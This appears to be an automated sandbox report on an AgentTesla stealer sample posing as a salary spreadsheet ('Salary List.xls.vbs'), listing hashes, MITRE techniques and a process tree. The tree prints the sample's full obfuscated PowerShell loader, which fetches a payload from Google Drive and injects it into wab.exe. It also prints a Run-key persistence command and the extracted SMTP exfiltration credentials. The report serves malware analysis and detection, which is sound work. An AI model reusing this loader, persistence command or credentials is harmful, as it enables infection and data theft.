agenttesla | 4de05aee1a99ea577443c742aa6c1ce05e88c3c716c234f1d1598c2e648486da

General

Target

Salary List.xls.vbs
Size

1.1MB
MD5

895c0c58f0e05a6b30b1b1956e76c16b
SHA1

e56fc2959189ec7a520cbc17703ea3aa4550253c
SHA256

4de05aee1a99ea577443c742aa6c1ce05e88c3c716c234f1d1598c2e648486da
SHA512

51ee9a36c1f8b3a1c4dc17d8b823da8abcc78002fe4c81ae22010107f8f5536b7dde7217e662bc5feed85305629fc1b730e7cc25cd01ab83bf8c5b69c44faeb8
SSDEEP

12288:j31cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRj+:jYz64+2Sj+

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.myhydropowered.com
Port:
587
Username:
[email protected]
Password:
JAyhAGxxVOdW6FW
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	1788	powershell.exe
13	1788	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\\Kneepads\\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
9	drive.google.com
44	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
49	api.ipify.org
50	api.ipify.org
51	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4868	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3080	powershell.exe
4868	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3080 set thread context of 4868	3080	powershell.exe	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3816	reg.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1788	powershell.exe
1788	powershell.exe
3080	powershell.exe
3080	powershell.exe
3080	powershell.exe
4868	wab.exe
4868	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3080	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	4868	wab.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2596 wrote to memory of 1788	2596	WScript.exe	83
PID 2596 wrote to memory of 1788	2596	WScript.exe	83
PID 1788 wrote to memory of 1504	1788	powershell.exe	85
PID 1788 wrote to memory of 1504	1788	powershell.exe	85
PID 1788 wrote to memory of 3080	1788	powershell.exe	95
PID 1788 wrote to memory of 3080	1788	powershell.exe	95
PID 1788 wrote to memory of 3080	1788	powershell.exe	95
PID 3080 wrote to memory of 4904	3080	powershell.exe	96
PID 3080 wrote to memory of 4904	3080	powershell.exe	96
PID 3080 wrote to memory of 4904	3080	powershell.exe	96
PID 3080 wrote to memory of 4868	3080	powershell.exe	100
PID 3080 wrote to memory of 4868	3080	powershell.exe	100
PID 3080 wrote to memory of 4868	3080	powershell.exe	100
PID 3080 wrote to memory of 4868	3080	powershell.exe	100
PID 3080 wrote to memory of 4868	3080	powershell.exe	100
PID 4868 wrote to memory of 1384	4868	wab.exe	102
PID 4868 wrote to memory of 1384	4868	wab.exe	102
PID 4868 wrote to memory of 1384	4868	wab.exe	102
PID 1384 wrote to memory of 3816	1384	cmd.exe	104
PID 1384 wrote to memory of 3816	1384	cmd.exe	104
PID 1384 wrote to memory of 3816	1384	cmd.exe	104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Salary List.xls.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Rekruttere='S';$Rekruttere+='ubs';$Rekruttere+='tri';$slanterne = 1;$Rekruttere+='ng';Function Auricyanhydric($Pandaric){$Microcytic=$Pandaric.Length-$slanterne;For( $Eurobarometer=7;$Eurobarometer -lt $Microcytic;$Eurobarometer+=8){$Semuncia+=$Pandaric.$Rekruttere.Invoke( $Eurobarometer, $slanterne);}$Semuncia;}function Forskerholdene($Countergambit){ . ($Accumber) ($Countergambit);}$Spartina=Auricyanhydric 'Ettals M Holo,hoW ooplaz CherimiLreproglCapricolPincustaDeliriu/Burnyko5 Chutzp.Micropa0Blephar pumpkin(Nonc nsWTrihal.iLappingnGensta d UdvikloNlnyhedw Horn.esAdenine RespektNGrafikmT.oshsca selvcen1Forsynd0Handels.Dvalent0Al,erta; Motetu K ingesWPectiniiApotheonTistyks6Grum ab4Tegnese;Genial. OmfavnexCeliosc6Bluster4Crispie;drjed.r Enkroner MorgenvGgeblom:E,ulger1Con,hom2 ,apper1Sphy ni.Forhjet0Filt.rp)Underta FremtoGTur,aboeEndotrocG.usgrak NotendoLittesa/Deq.een2Maniske0 To.vta1Suppler0 nordst0,ubjekt1Ekspone0Sindsop1Oranunp DetekteF Noncrii akkedrrUnder de EnkeltfLogiskeoKviltnixFrifind/Beskriv1Prefixi2 Stavri1Fremb,d.Ant,sep0Velform ';$Dilatableness=Auricyanhydric ',eltlngUTechnicsOpsigeledrivh sr ncleri- paulseA edeliggSnvledeeTjenestn DatabatAkademi ';$Isalena=Auricyanhydric 'BlusserhSkyggertViolonctUnretropAndelslsC,ttonw:Re rutt/ Dalbyd/ VejrsadVildtbirAn.enbeiFeltprsv Encradeschf.re.Magtensg Cyk,ltoSafterno ActivagBlowh,lledinb.re Superv.Demifusc Al,neao enialm Hastat/No,evocuSuperimcQuick e?Salatste moralxU garnfpMacrop oGastrotrTrmlksftRosolic=T.stubbd Phobiso CirkelwKonsis nAwmbriel AnorgaoMinerneaEn,gtendReducta& MelocoiSvin.ridSprogta=Skalspi1 AmourssVacil.aPRecapitJEvange,TVitialuE L.dsidOCly eniNUnprevev B.rgerCKonusidgTaboredXRacerenKasco.aruIncalveBN,ocubiqMisha toR gulatz LgehonoSydslesP,lyantsc HvervexUproot,WAffdtesxCameralhKulturpU.rswaywPReluctso LmlensKMuscled4EngembiUFormuliZSl vebok Optrk, ';$Modtagelsesdatoers=Auricyanhydric 'Ziriani>Indrapp ';$Accumber=Auricyanhydric ' Per eriSkrmbileLytteapx Stormn ';$Sankthansaftnen187='Amargosos';$Hofternes = Auricyanhydric '.natosaeRattingcOrdflomh.sarevnoAandsvr Fralgge%Spil.emaTabbillppizzabap Aandigdabbedisa Tv,ngstBundskja.haeosp%Medvide\ ToddyeU Fyrr md Unve.eeAnkringnKitchpobSchi lio Pebe mrHvervetdTuppe,isVolita mKlov.eroTitalsltProvinsoafsyrburVarsomh.SnablenVNon.isceSudanerj Forel, Antil,t&Udvi kn& Cel,do GrousineClifforcMenstruhillianno ,ndert Unmixdytpatr,ar ';Forskerholdene (Auricyanhydric 'Accordi$BaraitagVirensjltren ieoBe.rdedb .sotroaAntilialArdoise:AstrophHBaroucheGransknt,lyawayzBelyingeDisscepnUnbluesskogalsk=Krympes(Borgerrc.fretnimProduktd.uvaere Tykning/Rein.ercReading Tilkbet$Uner.tiHGlycoluoAlligatfFallitbtTransece varmemrCawst.rnliberaleIn bilds,upaiau)Lanknes ');Forskerholdene (Auricyanhydric 'Mourns,$SkrivergSpiritulAst,nykoAccelerbC.eeredaklaringlIngust :cephaloO.eskripr WoodmagMononucaDesmerenFon.anei Tilbygs rndseaS.atshatHestek iKaolinsoLusketbnWildishsD.gsmaafSolsortoBoloismrLukewarmsm ltereDissembrplasmopnS.ersbyeRemortgs Fdsels=viftenk$SelvantIZ.oplassBisp.gaaIndkomslSpl,nteeUnre lenNinetyfa Une.fa.Merud isProstrapBalzar l,onkeyhidakoitst monami(Turtosa$PhthaleMPjalteroPhotosedAlvildst,nfundiaUnshr bgDwtan.eepromisclFremtvusBaelteseJolleymsSwellerdErhvervaFlirtpotOppo tuoCykelhae ,edhngrListesksMirijan)Fe tose ');$Isalena=$Organisationsformernes[0];$begets= (Auricyanhydric 'Justerv$Tetra rgFjeldsbl SkrddeoSubul.fbTrianguaUniflaglDatagru:masseprSCylindrl Dinaspi SlagtegKn,ldgah Pegam,tNonprudeisln.insvietnamt,tikker=.ntifonNBalkavaeP.lotsywFr,itil- Skin.fO NedskrbMindretjPlatodeeFodboldcInternetpneuma, PencilS translyGen.dtesLasarwotDronerseUredinemBlo,ste.DokumenNIntercoeGastrittTribula.SpaantaWStikline Smk.edbBen dicCPostphtlT strukiRectif e Ca,tionUla lart');$begets+=$Hetzens[1];Forskerholdene ($begets);Forskerholdene (Auricyanhydric ' Ko.dpr$Und rseSIntabullMusco,iiowe mang IntoxihOmvisentNonabraeAfrustnsLighedstIndikat.Jol erhH Sulfide Stive,aGenfremd UndereeF,otwayrRedirigssisterl[B.mrkni$ haunchDAe.uianiHigdo,llAerometaBorgerhtBa.projaUnfernlbGnomonil InsinueZebrablnCon opteIn,estesCommunisForblff]Afstikk=Wrainst$CenterlSAbdic,tptopchefa HoggyarDrouthitUmbrineiZoospgin,quirinaRomeite ');$alkoholikeren=Auricyanhydric 'informa$SlyngboS ultislC,nterhiIllustrgReshinehbygget,t EskimoeSmilaxes,ovbefatDissymm.SabrephD DokumeoGttforswSaalskanSljdenslTepott,o Na velaRealle.d E.hoisF Gains,iFarmhoulDaarekieLan.zon(Hor,oni$AntndelIKreditgsA,kerneaKommandl Webbieeabsolven VindtraKrimina,Imbalme$SikkerhnAbhorsaiBrn,vrntDipleurtAzotisie DeerhonProsomadCommentePaskvild S rmsteUnr.joilCapitol)Chlamyd ';$nittendedel=$Hetzens[0];Forskerholdene (Auricyanhydric 'Sany ko$TankanggNonneorl ubpharoslg.sprbEfter,aaHemme,ilG stero:I dkoblP FlaatsoBasi,idp DittemuTornirilHypother.nrealit Fuldst=G.ptisk(arbithfTKmpehjjefratruksAntagont anstte-OophoroP .appyraTillidstJaunbakhVestenv Ammunit$Woodbinn ldgreri O,egratPet,ysttIngmarse TransanLegsstidUnc nceevitessedDemarkseSpellinl famili)Filtrat ');while (!$Populrt) {Forskerholdene (Auricyanhydric 'O sedeu$Sylvag.gSvinghjl BurhnsoAnlgsa,b,etragra FakturlU verid:Weir,neSUr,tfrdc InkleseIndv,innBetalinaVagtannrTissemaiUdradersSkydelokTe ebri=svededr$Chancr tDataopsrRygepauu forste moundw ') ;Forskerholdene $alkoholikeren;Forskerholdene (Auricyanhydric 'BiavlerSUnitr.st nutcera pc,reirskrivestnavaho.-DrooptpSSkarnbol Bund,peHasheeseTrykkedpModef,l palisad4 Reg af ');Forskerholdene (Auricyanhydric 'Fyrsteh$Prefi,ugNontolelShaled.oSkjtekobHyposthaPat.oullRegimen:KlimatoPEksorbioC,arbocpRet.stauTrio.erlPopelyprTattleft Deltal=b,astoc(WhoduniTstyringeBrugtvosAb,orbatHusaren-BykernePMilj ttaDepictitSlu edehKrok.se G.veren$Ema lvonOrth cei StigmatTrveskrtUnaddede AdmiranDannebrd synseveHae athdSjoveree ejlslul vagin)Bogsurn ') ;Forskerholdene (Auricyanhydric 'vo.nman$ ubeh,fgOvera dlFilamenoMyosin,b,udevoraAscri,tl Embiot:Avan,gak.eurololPersonsuFormicadBru.secr alecheeDominikd,dendrseAccelers Kronpr=Abjects$StinkskgNige,ialWheeplioPrdikedb El ctratap,ttalOprinde:ZoolithN Ka erssSvingkatForle.eb Parodoe Livsted Un kkesTrommestTilm.ld+Torech +Luxk oa% Tobakk$BrakestO traykirsondringAmagermaSortebrnConidiui StdpudsAmbula.a Hi,hhatNavigatiEndot,eoLookywanIspindesSkolerafEfterudoOptagetrInter rmSecreteePolyp,ar OpvasknMo alpreCo partsSynskre. overlacFdrela,oJuris euNo.dmarn Udsalgt veteri ') ;$Isalena=$Organisationsformernes[$kludredes];}$Entosphenal=336951;$Storrums=29963;Forskerholdene (Auricyanhydric 'Voltmet$shfalmegFancifulRo,antioFrostklbBochu haInsolvel Affyri:Taks.noFarbejdslAngelicy.lurrinnSa,mensdoffsetteFluefanrtriska. S,apsu=Centerv UnpaupeG dis cieBestrewtUnslyma-Keg,estCSeptocoo DigitinleannestLandskaeTab.erinC.ntraltviewpoi Filator$lagdelinBeadrowiStrmerbtRullematD.cryoceOverir nUnvi.iodEm,owereBrne ykd AsympteBudgetmlLe,copl ');Forskerholdene (Auricyanhydric 'Ligfald$ToldeglgKlassislChiti.ooLen itubUk,alifaVeggierlBrmmer,:Da,elsmMTransyldNarkosed KnoxviiNettiesn Udpi.tg Se,rnesSk iveb Acanth= Blood Shog.p[ monophSKongresy ForsvasOve.skytDj,elske preautmFumete.. KntrenCindkraeo Tse idn ejevrvOpsgnineHaylagerPupemottCh,nger]Forward:Ordkomb:UdbasunFamtspolrContermoT,rapeumMuffi,hBVordingaConn tisEneta.ee Anlgsb6 Afdeli4Unmoat.SRitterstFlymekarBlaguebi Andr,gnDemiha.gJant.rp(transve$CunjevoFH,permnlAanderfyKat lyzn Stru,td BogtryeOuttalkrUtilfre) Ditet ');Forskerholdene (Auricyanhydric 'Reverse$embryopgIntertrlStrblinoSaft,olbCarpoidaPhoronilbaraltv:T,kerneRDaw sderHa,cucalDramatigTelesiagDemobileFul,ends Verbif Stofpri= Skille A,onine[gnomonfSUdlud.iy Simults SaudiatGa,troceSpidstemTempest.Hir,ellTFeru.ebeRkeb,skxReli,blt,elefon.LavningEFrygisknLegemulc SpherioDebarbadEpic leiTredjepnAfklippgNonvi.u]Frightl: Asepto:brachyaAUdklassS,olioviC BornylIChaf suIBewired.DutcherGArbej.seSindstitCastlewSToptekstTajgaenrVand aniJul kaknRaced sgGulfwee(Gnathon$AnhydreM SomnoldBulensad KastreiEndothrnprisonlgFarsotes Outwhi)Vest.ns ');Forskerholdene (Auricyanhydric ' .agtso$YogasangFormildl Str,ndoDermostb Gya.una B.ntuelDra ber:IncumbeHSiretlea.emelytlglsningvStraffelNonfalleD.umaslgHelnodesparce,erLode,srealeins,sSi elinuLe ningl,rosscutObolbliaIsl mistOvergrasW,tjarn=Sivathe$AmassetRForulykrSam,undlTyr.nneg Ho tesg KlumreeNiftinesInorna..InfragesPrferenu rembrbHela,tosUdgan.stRustederBhlamdei MediusnoctosylgDe,ylen(Overfou$SenilkoE ObituanMisfornt L ndedoNetma.esEstaminpVikingehaphrodie dr,matnPizzaeraArticullHeterop,Befugte$BalanceS Semi.at P eudaoKlistrirHardhe,rOffloadumorphopmTilvkstsVa.dtrd)Fravri, ');Forskerholdene $Halvlegsresultats;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1788
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udenbordsmotor.Vej && echo t"
    3⤵
    PID:1504
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Rekruttere='S';$Rekruttere+='ubs';$Rekruttere+='tri';$slanterne = 1;$Rekruttere+='ng';Function Auricyanhydric($Pandaric){$Microcytic=$Pandaric.Length-$slanterne;For( $Eurobarometer=7;$Eurobarometer -lt $Microcytic;$Eurobarometer+=8){$Semuncia+=$Pandaric.$Rekruttere.Invoke( $Eurobarometer, $slanterne);}$Semuncia;}function Forskerholdene($Countergambit){ . ($Accumber) ($Countergambit);}$Spartina=Auricyanhydric 'Ettals M Holo,hoW ooplaz CherimiLreproglCapricolPincustaDeliriu/Burnyko5 Chutzp.Micropa0Blephar pumpkin(Nonc nsWTrihal.iLappingnGensta d UdvikloNlnyhedw Horn.esAdenine RespektNGrafikmT.oshsca selvcen1Forsynd0Handels.Dvalent0Al,erta; Motetu K ingesWPectiniiApotheonTistyks6Grum ab4Tegnese;Genial. OmfavnexCeliosc6Bluster4Crispie;drjed.r Enkroner MorgenvGgeblom:E,ulger1Con,hom2 ,apper1Sphy ni.Forhjet0Filt.rp)Underta FremtoGTur,aboeEndotrocG.usgrak NotendoLittesa/Deq.een2Maniske0 To.vta1Suppler0 nordst0,ubjekt1Ekspone0Sindsop1Oranunp DetekteF Noncrii akkedrrUnder de EnkeltfLogiskeoKviltnixFrifind/Beskriv1Prefixi2 Stavri1Fremb,d.Ant,sep0Velform ';$Dilatableness=Auricyanhydric ',eltlngUTechnicsOpsigeledrivh sr ncleri- paulseA edeliggSnvledeeTjenestn DatabatAkademi ';$Isalena=Auricyanhydric 'BlusserhSkyggertViolonctUnretropAndelslsC,ttonw:Re rutt/ Dalbyd/ VejrsadVildtbirAn.enbeiFeltprsv Encradeschf.re.Magtensg Cyk,ltoSafterno ActivagBlowh,lledinb.re Superv.Demifusc Al,neao enialm Hastat/No,evocuSuperimcQuick e?Salatste moralxU garnfpMacrop oGastrotrTrmlksftRosolic=T.stubbd Phobiso CirkelwKonsis nAwmbriel AnorgaoMinerneaEn,gtendReducta& MelocoiSvin.ridSprogta=Skalspi1 AmourssVacil.aPRecapitJEvange,TVitialuE L.dsidOCly eniNUnprevev B.rgerCKonusidgTaboredXRacerenKasco.aruIncalveBN,ocubiqMisha toR gulatz LgehonoSydslesP,lyantsc HvervexUproot,WAffdtesxCameralhKulturpU.rswaywPReluctso LmlensKMuscled4EngembiUFormuliZSl vebok Optrk, ';$Modtagelsesdatoers=Auricyanhydric 'Ziriani>Indrapp ';$Accumber=Auricyanhydric ' Per eriSkrmbileLytteapx Stormn ';$Sankthansaftnen187='Amargosos';$Hofternes = Auricyanhydric '.natosaeRattingcOrdflomh.sarevnoAandsvr Fralgge%Spil.emaTabbillppizzabap Aandigdabbedisa Tv,ngstBundskja.haeosp%Medvide\ ToddyeU Fyrr md Unve.eeAnkringnKitchpobSchi lio Pebe mrHvervetdTuppe,isVolita mKlov.eroTitalsltProvinsoafsyrburVarsomh.SnablenVNon.isceSudanerj Forel, Antil,t&Udvi kn& Cel,do GrousineClifforcMenstruhillianno ,ndert Unmixdytpatr,ar ';Forskerholdene (Auricyanhydric 'Accordi$BaraitagVirensjltren ieoBe.rdedb .sotroaAntilialArdoise:AstrophHBaroucheGransknt,lyawayzBelyingeDisscepnUnbluesskogalsk=Krympes(Borgerrc.fretnimProduktd.uvaere Tykning/Rein.ercReading Tilkbet$Uner.tiHGlycoluoAlligatfFallitbtTransece varmemrCawst.rnliberaleIn bilds,upaiau)Lanknes ');Forskerholdene (Auricyanhydric 'Mourns,$SkrivergSpiritulAst,nykoAccelerbC.eeredaklaringlIngust :cephaloO.eskripr WoodmagMononucaDesmerenFon.anei Tilbygs rndseaS.atshatHestek iKaolinsoLusketbnWildishsD.gsmaafSolsortoBoloismrLukewarmsm ltereDissembrplasmopnS.ersbyeRemortgs Fdsels=viftenk$SelvantIZ.oplassBisp.gaaIndkomslSpl,nteeUnre lenNinetyfa Une.fa.Merud isProstrapBalzar l,onkeyhidakoitst monami(Turtosa$PhthaleMPjalteroPhotosedAlvildst,nfundiaUnshr bgDwtan.eepromisclFremtvusBaelteseJolleymsSwellerdErhvervaFlirtpotOppo tuoCykelhae ,edhngrListesksMirijan)Fe tose ');$Isalena=$Organisationsformernes[0];$begets= (Auricyanhydric 'Justerv$Tetra rgFjeldsbl SkrddeoSubul.fbTrianguaUniflaglDatagru:masseprSCylindrl Dinaspi SlagtegKn,ldgah Pegam,tNonprudeisln.insvietnamt,tikker=.ntifonNBalkavaeP.lotsywFr,itil- Skin.fO NedskrbMindretjPlatodeeFodboldcInternetpneuma, PencilS translyGen.dtesLasarwotDronerseUredinemBlo,ste.DokumenNIntercoeGastrittTribula.SpaantaWStikline Smk.edbBen dicCPostphtlT strukiRectif e Ca,tionUla lart');$begets+=$Hetzens[1];Forskerholdene ($begets);Forskerholdene (Auricyanhydric ' Ko.dpr$Und rseSIntabullMusco,iiowe mang IntoxihOmvisentNonabraeAfrustnsLighedstIndikat.Jol erhH Sulfide Stive,aGenfremd UndereeF,otwayrRedirigssisterl[B.mrkni$ haunchDAe.uianiHigdo,llAerometaBorgerhtBa.projaUnfernlbGnomonil InsinueZebrablnCon opteIn,estesCommunisForblff]Afstikk=Wrainst$CenterlSAbdic,tptopchefa HoggyarDrouthitUmbrineiZoospgin,quirinaRomeite ');$alkoholikeren=Auricyanhydric 'informa$SlyngboS ultislC,nterhiIllustrgReshinehbygget,t EskimoeSmilaxes,ovbefatDissymm.SabrephD DokumeoGttforswSaalskanSljdenslTepott,o Na velaRealle.d E.hoisF Gains,iFarmhoulDaarekieLan.zon(Hor,oni$AntndelIKreditgsA,kerneaKommandl Webbieeabsolven VindtraKrimina,Imbalme$SikkerhnAbhorsaiBrn,vrntDipleurtAzotisie DeerhonProsomadCommentePaskvild S rmsteUnr.joilCapitol)Chlamyd ';$nittendedel=$Hetzens[0];Forskerholdene (Auricyanhydric 'Sany ko$TankanggNonneorl ubpharoslg.sprbEfter,aaHemme,ilG stero:I dkoblP FlaatsoBasi,idp DittemuTornirilHypother.nrealit Fuldst=G.ptisk(arbithfTKmpehjjefratruksAntagont anstte-OophoroP .appyraTillidstJaunbakhVestenv Ammunit$Woodbinn ldgreri O,egratPet,ysttIngmarse TransanLegsstidUnc nceevitessedDemarkseSpellinl famili)Filtrat ');while (!$Populrt) {Forskerholdene (Auricyanhydric 'O sedeu$Sylvag.gSvinghjl BurhnsoAnlgsa,b,etragra FakturlU verid:Weir,neSUr,tfrdc InkleseIndv,innBetalinaVagtannrTissemaiUdradersSkydelokTe ebri=svededr$Chancr tDataopsrRygepauu forste moundw ') ;Forskerholdene $alkoholikeren;Forskerholdene (Auricyanhydric 'BiavlerSUnitr.st nutcera pc,reirskrivestnavaho.-DrooptpSSkarnbol Bund,peHasheeseTrykkedpModef,l palisad4 Reg af ');Forskerholdene (Auricyanhydric 'Fyrsteh$Prefi,ugNontolelShaled.oSkjtekobHyposthaPat.oullRegimen:KlimatoPEksorbioC,arbocpRet.stauTrio.erlPopelyprTattleft Deltal=b,astoc(WhoduniTstyringeBrugtvosAb,orbatHusaren-BykernePMilj ttaDepictitSlu edehKrok.se G.veren$Ema lvonOrth cei StigmatTrveskrtUnaddede AdmiranDannebrd synseveHae athdSjoveree ejlslul vagin)Bogsurn ') ;Forskerholdene (Auricyanhydric 'vo.nman$ ubeh,fgOvera dlFilamenoMyosin,b,udevoraAscri,tl Embiot:Avan,gak.eurololPersonsuFormicadBru.secr alecheeDominikd,dendrseAccelers Kronpr=Abjects$StinkskgNige,ialWheeplioPrdikedb El ctratap,ttalOprinde:ZoolithN Ka erssSvingkatForle.eb Parodoe Livsted Un kkesTrommestTilm.ld+Torech +Luxk oa% Tobakk$BrakestO traykirsondringAmagermaSortebrnConidiui StdpudsAmbula.a Hi,hhatNavigatiEndot,eoLookywanIspindesSkolerafEfterudoOptagetrInter rmSecreteePolyp,ar OpvasknMo alpreCo partsSynskre. overlacFdrela,oJuris euNo.dmarn Udsalgt veteri ') ;$Isalena=$Organisationsformernes[$kludredes];}$Entosphenal=336951;$Storrums=29963;Forskerholdene (Auricyanhydric 'Voltmet$shfalmegFancifulRo,antioFrostklbBochu haInsolvel Affyri:Taks.noFarbejdslAngelicy.lurrinnSa,mensdoffsetteFluefanrtriska. S,apsu=Centerv UnpaupeG dis cieBestrewtUnslyma-Keg,estCSeptocoo DigitinleannestLandskaeTab.erinC.ntraltviewpoi Filator$lagdelinBeadrowiStrmerbtRullematD.cryoceOverir nUnvi.iodEm,owereBrne ykd AsympteBudgetmlLe,copl ');Forskerholdene (Auricyanhydric 'Ligfald$ToldeglgKlassislChiti.ooLen itubUk,alifaVeggierlBrmmer,:Da,elsmMTransyldNarkosed KnoxviiNettiesn Udpi.tg Se,rnesSk iveb Acanth= Blood Shog.p[ monophSKongresy ForsvasOve.skytDj,elske preautmFumete.. KntrenCindkraeo Tse idn ejevrvOpsgnineHaylagerPupemottCh,nger]Forward:Ordkomb:UdbasunFamtspolrContermoT,rapeumMuffi,hBVordingaConn tisEneta.ee Anlgsb6 Afdeli4Unmoat.SRitterstFlymekarBlaguebi Andr,gnDemiha.gJant.rp(transve$CunjevoFH,permnlAanderfyKat lyzn Stru,td BogtryeOuttalkrUtilfre) Ditet ');Forskerholdene (Auricyanhydric 'Reverse$embryopgIntertrlStrblinoSaft,olbCarpoidaPhoronilbaraltv:T,kerneRDaw sderHa,cucalDramatigTelesiagDemobileFul,ends Verbif Stofpri= Skille A,onine[gnomonfSUdlud.iy Simults SaudiatGa,troceSpidstemTempest.Hir,ellTFeru.ebeRkeb,skxReli,blt,elefon.LavningEFrygisknLegemulc SpherioDebarbadEpic leiTredjepnAfklippgNonvi.u]Frightl: Asepto:brachyaAUdklassS,olioviC BornylIChaf suIBewired.DutcherGArbej.seSindstitCastlewSToptekstTajgaenrVand aniJul kaknRaced sgGulfwee(Gnathon$AnhydreM SomnoldBulensad KastreiEndothrnprisonlgFarsotes Outwhi)Vest.ns ');Forskerholdene (Auricyanhydric ' .agtso$YogasangFormildl Str,ndoDermostb Gya.una B.ntuelDra ber:IncumbeHSiretlea.emelytlglsningvStraffelNonfalleD.umaslgHelnodesparce,erLode,srealeins,sSi elinuLe ningl,rosscutObolbliaIsl mistOvergrasW,tjarn=Sivathe$AmassetRForulykrSam,undlTyr.nneg Ho tesg KlumreeNiftinesInorna..InfragesPrferenu rembrbHela,tosUdgan.stRustederBhlamdei MediusnoctosylgDe,ylen(Overfou$SenilkoE ObituanMisfornt L ndedoNetma.esEstaminpVikingehaphrodie dr,matnPizzaeraArticullHeterop,Befugte$BalanceS Semi.at P eudaoKlistrirHardhe,rOffloadumorphopmTilvkstsVa.dtrd)Fravri, ');Forskerholdene $Halvlegsresultats;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3080
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udenbordsmotor.Vej && echo t"
      4⤵
      PID:4904
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4868
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\Kneepads\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1384
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\Kneepads\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:3816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Parilicium.txt

Filesize
602B

MD5
376536aade229d920a9dff79ad4197a5

SHA1
7c2b4fc7fdc13ab492435dd3d463463e7bf3ff19

SHA256
fb7a312ea2ff60253b3d61acb6a8d3478751b8b032b9e712ff57bc25eea02015

SHA512
4518c71d0f76b0c9208d96f3e0b4f89ef91fda5f3b419329e0134728b68ded1cb6ab2fd31f49b41d1d7f1f0a01a58cd4fda41f1a162c5f57b7bdaf07424f82bd

Download Submit
